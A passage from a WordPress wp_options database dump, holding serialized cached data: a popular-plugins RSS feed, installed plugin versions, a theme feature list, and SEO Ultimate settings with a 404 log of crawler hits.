Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Google XML Sitemaps\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"http://wordpress.org/plugins/google-sitemap-generator/#post-132\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 09 Mar 2007 22:31:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"132@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:105:\"This plugin will generate a special XML sitemap which will help search engines to better index your blog.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"Arnee\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WP Super Cache\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"http://wordpress.org/plugins/wp-super-cache/#post-2572\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 05 Nov 2007 11:40:04 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"2572@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"A very fast caching engine for WordPress that produces static html files.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Donncha O Caoimh\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"WooCommerce - excelling eCommerce\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"http://wordpress.org/plugins/woocommerce/#post-29860\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 05 Sep 2011 08:13:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"29860@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:97:\"WooCommerce is a powerful, extendable eCommerce plugin that helps you sell anything. Beautifully.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"WooThemes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"WordPress SEO by Yoast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"http://wordpress.org/plugins/wordpress-seo/#post-8321\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 01 Jan 2009 20:34:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"8321@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:131:\"Improve your WordPress SEO: Write better content and have a fully optimized WordPress site using the WordPress SEO plugin by Yoast.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Joost de Valk\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Wordfence Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"http://wordpress.org/plugins/wordfence/#post-29832\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 04 Sep 2011 03:13:51 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"29832@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:148:\"Wordfence Security is a free enterprise class security plugin that includes a firewall, virus scanning, real-time traffic with geolocation and more.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Wordfence\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:24:\"Jetpack by WordPress.com\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"http://wordpress.org/plugins/jetpack/#post-23862\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 Jan 2011 02:21:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"23862@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:104:\"Supercharge your WordPress site with powerful features previously only available to WordPress.com users.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Tim Moore\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"WordPress Importer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"http://wordpress.org/plugins/wordpress-importer/#post-18101\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 May 2010 17:42:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"18101@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:101:\"Import posts, pages, comments, custom fields, categories, tags and more from a WordPress export file.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Brian Colinger\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Broken Link Checker\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"http://wordpress.org/plugins/broken-link-checker/#post-2441\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 08 Oct 2007 21:35:04 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"2441@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:131:\"This plugin will check your posts, comments and other content for broken links and missing images, and notify you if any are found.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Janis Elsts\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"Captcha\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"http://wordpress.org/plugins/captcha/#post-26129\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 27 Apr 2011 05:53:50 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"26129@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"This plugin allows you to implement super security captcha form into web forms.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"bestwebsoft\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Contact Form\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"http://wordpress.org/plugins/contact-form-plugin/#post-26890\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 26 May 2011 07:34:58 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"26890@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:43:\"Add Contact Form to your WordPress website.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"bestwebsoft\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"TinyMCE Advanced\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"http://wordpress.org/plugins/tinymce-advanced/#post-2082\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 27 Jun 2007 15:00:26 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"2082@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"Enables the advanced features of TinyMCE, the WordPress WYSIWYG editor.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Andrew Ozz\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:45:\"http://wordpress.org/plugins/rss/view/popular\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:10:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Sun, 27 Oct 2013 14:21:38 GMT\";s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:10:\"connection\";s:5:\"close\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:7:\"expires\";s:29:\"Sun, 27 Oct 2013 14:33:25 GMT\";s:13:\"cache-control\";s:0:\"\";s:6:\"pragma\";s:0:\"\";s:13:\"last-modified\";s:31:\"Sun, 27 Oct 2013 13:58:25 +0000\";s:4:\"x-nc\";s:11:\"HIT lax 250\";}s:5:\"build\";s:14:\"20130523180038\";}', 'no'),
(2861, '_site_transient_update_plugins', 'O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1383555266;s:7:\"checked\";a:13:{s:19:\"akismet/akismet.php\";s:5:\"2.5.9\";s:35:\"clicface-trombi/clicface-trombi.php\";s:4:\"1.09\";s:36:\"contact-form-7/wp-contact-form-7.php\";s:5:\"3.5.3\";s:35:\"display-widgets/display-widgets.php\";s:4:\"1.24\";s:25:\"easy-table/easy-table.php\";s:3:\"1.4\";s:43:\"google-analyticator/google-analyticator.php\";s:5:\"6.4.5\";s:9:\"hello.php\";s:3:\"1.6\";s:19:\"piklist/piklist.php\";s:5:\"0.7.2\";s:47:\"really-simple-captcha/really-simple-captcha.php\";s:3:\"1.7\";s:29:\"seo-ultimate/seo-ultimate.php\";s:5:\"7.6.1\";s:31:\"slideshow-manager/slideshow.php\";s:5:\"2.1.2\";s:29:\"total-slider/total-slider.php\";s:5:\"1.1.4\";s:37:\"widgets-on-pages/widgets_on_pages.php\";s:6:\"0.0.12\";}s:8:\"response\";a:0:{}s:12:\"translations\";a:0:{}}', 'yes'),
(3327, '_site_transient_timeout_wporg_theme_feature_list', '1383596164', 'yes'),
(3328, '_site_transient_wporg_theme_feature_list', 'a:5:{s:6:\"Colors\";a:15:{i:0;s:5:\"black\";i:1;s:4:\"blue\";i:2;s:5:\"brown\";i:3;s:4:\"gray\";i:4;s:5:\"green\";i:5;s:6:\"orange\";i:6;s:4:\"pink\";i:7;s:6:\"purple\";i:8;s:3:\"red\";i:9;s:6:\"silver\";i:10;s:3:\"tan\";i:11;s:5:\"white\";i:12;s:6:\"yellow\";i:13;s:4:\"dark\";i:14;s:5:\"light\";}s:7:\"Columns\";a:6:{i:0;s:10:\"one-column\";i:1;s:11:\"two-columns\";i:2;s:13:\"three-columns\";i:3;s:12:\"four-columns\";i:4;s:12:\"left-sidebar\";i:5;s:13:\"right-sidebar\";}s:5:\"Width\";a:2:{i:0;s:11:\"fixed-width\";i:1;s:14:\"flexible-width\";}s:8:\"Features\";a:19:{i:0;s:8:\"blavatar\";i:1;s:10:\"buddypress\";i:2;s:17:\"custom-background\";i:3;s:13:\"custom-colors\";i:4;s:13:\"custom-header\";i:5;s:11:\"custom-menu\";i:6;s:12:\"editor-style\";i:7;s:21:\"featured-image-header\";i:8;s:15:\"featured-images\";i:9;s:15:\"flexible-header\";i:10;s:20:\"front-page-post-form\";i:11;s:19:\"full-width-template\";i:12;s:12:\"microformats\";i:13;s:12:\"post-formats\";i:14;s:20:\"rtl-language-support\";i:15;s:11:\"sticky-post\";i:16;s:13:\"theme-options\";i:17;s:17:\"threaded-comments\";i:18;s:17:\"translation-ready\";}s:7:\"Subject\";a:3:{i:0;s:7:\"holiday\";i:1;s:13:\"photoblogging\";i:2;s:8:\"seasonal\";}}', 'yes'),
(771, 'seo_ultimate', 'a:3:{s:7:\"version\";s:5:\"7.6.1\";s:7:\"modules\";a:37:{s:7:\"modules\";i:10;s:7:\"widgets\";i:10;s:4:\"fofs\";i:10;s:8:\"fofs-log\";i:10;s:13:\"fofs-settings\";i:10;s:12:\"import-aiosp\";i:10;s:9:\"canonical\";i:10;s:9:\"user-code\";i:10;s:17:\"content-autolinks\";i:10;s:26:\"content-autolinks-settings\";i:10;s:9:\"autolinks\";i:10;s:5:\"files\";i:10;s:16:\"footer-autolinks\";i:10;s:25:\"footer-autolinks-settings\";i:10;s:15:\"global-settings\";i:10;s:7:\"install\";i:10;s:21:\"internal-link-aliases\";i:10;s:7:\"linkbox\";i:10;s:17:\"meta-descriptions\";i:10;s:11:\"meta-robots\";i:10;s:10:\"more-links\";i:10;s:7:\"noindex\";i:10;s:9:\"opengraph\";i:10;s:10:\"permalinks\";i:10;s:13:\"rich-snippets\";i:10;s:8:\"settings\";i:10;s:13:\"settings-data\";i:10;s:11:\"wp-settings\";i:10;s:15:\"sharing-buttons\";i:10;s:5:\"slugs\";i:10;s:6:\"titles\";i:10;s:9:\"uninstall\";i:10;s:16:\"webmaster-verify\";i:10;s:8:\"sds-blog\";i:10;s:4:\"misc\";i:10;s:13:\"link-nofollow\";i:-10;s:13:\"meta-keywords\";i:-10;}s:4:\"cron\";a:1:{s:8:\"sds-blog\";a:1:{s:13:\"load_blog_rss\";a:3:{i:0;s:25:\"su-sds-blog-load-blog-rss\";i:1;i:1374769524;i:2;s:6:\"hourly\";}}}}', 'yes'),
(772, 'seo_ultimate_module_404s', 'a:7:{s:10:\"exceptions\";s:66:\"*/favicon.ico\n*/apple-touch-icon.png\n*/pingserver.php\n*/xmlrpc.php\";s:12:\"max_log_size\";i:100;s:11:\"log_enabled\";b:1;s:16:\"restrict_logging\";b:1;s:11:\"log_spiders\";b:1;s:24:\"log_errors_with_referers\";b:1;s:3:\"log\";a:20:{s:66:\"http://www.crosstrainingcenter.be/g;m.parentNode.insertBefore(a,m)\";a:5:{s:9:\"hit_count\";i:3;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:34:\"http://www.crosstrainingcenter.be/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1378436481;}s:84:\"http://www.crosstrainingcenter.be/le-cross-training/g;m.parentNode.insertBefore(a,m)\";a:5:{s:9:\"hit_count\";i:3;s:6:\"is_new\";b:1;